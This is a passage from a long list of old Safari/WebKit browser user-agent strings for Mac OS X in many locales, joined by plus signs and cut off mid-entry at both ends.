AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; sv-se) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; Intel Mac OS X; zh-tw) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS; en-en) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS; pl-pl) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; da-dk) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; de-de) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.3+ (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; es-es) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; hu-hu) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; it-it) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/525.13 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; nl-nl) AppleWebKit/533.16 (KHTML, like Gecko) Version/4.1 Safari/533.16 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; pl-pl) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; sv-se) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en-gb) AppleWebKit/526+ (KHTML, like Gecko) Version/3.1 Safari/525.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_3; sv-se) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1 Safari/525.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_4; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; fi-fi) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_5; fr-fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/528.16 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; en-us) AppleWebKit/530.1+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; fr-fr) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_6; nl-nl) AppleWebKit/530.0+ (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; en-us) AppleWebKit/532.0+ (KHTML, like Gecko) Version/4.0.3 Safari/531.9.2009 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.1b3pre) Gecko/20081212 Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_6_1; en_GB, en_US) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ca-es) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; da-dk) AppleWebKit/522+ (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-ch) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-CH) AppleWebKit/419.2 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-ch) AppleWebKit/85 (KHTML, like Gecko) Safari/85 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/124 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/124 (KHTML, like Gecko) Safari/125.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6.2 (KHTML, like Gecko) Safari/412.2.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/419.2 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/124 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.4 (KHTML, like Gecko) Safari/100 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.5.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6.2 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6.2 (KHTML, like Gecko) Safari/412.2.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.11 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11.1 (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/523.3+ (KHTML, like Gecko) Version/3.0.3 Safari/522.12.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-au) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en_CA) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-ca) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en_CA) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-gb) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-gb) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/124 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.7 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/125.5.7 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8.1 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en_US) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/412 (KHTML, like Gecko) Safari/412 Privoxy/3.0 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.9.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418.9 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/522.11 (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/522+ (KHTML, like Gecko) Version/3.0.2 Safari/522.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.10.3 (KHTML, like Gecko) Version/3.0.4 Safari/523.10 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/523.6 (KHTML, like Gecko) Version/3.0.3 Safari/523.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.6 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.8.2 (KHTML, like Gecko) Safari/85.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/418 (KHTML, like Gecko) Safari/417.9.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/125.2 (KHTML, like Gecko) Safari/125.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-ES) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; es-es) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fi-fi) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fi-fi) AppleWebKit/420+ (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5.1 (KHTML, like Gecko) Safari/312.3.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5.2 (KHTML, like Gecko) Safari/312.3.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.5 (KHTML, like Gecko) Safari/312.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412.6 (KHTML, like Gecko) Safari/412.2 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412.7 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/412 (KHTML, like Gecko) Safari/412 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.11 (KHTML, like Gecko) Safari/416.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/412.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/416.12 (KHTML, like Gecko) Safari/416.13_Adobe +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko) +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.5 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85.8.1 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ca) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-ch) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.4 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.6 (KHTML, like Gecko) Safari/125.12 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5 (KHTML, like Gecko) Safari/125.9 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1.1 (KHTML, like Gecko) Safari/312 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/312.1 (KHTML, like Gecko) Safari/125 +Mozilla/5.0 (Macintosh; U; PPC Mac OS X; 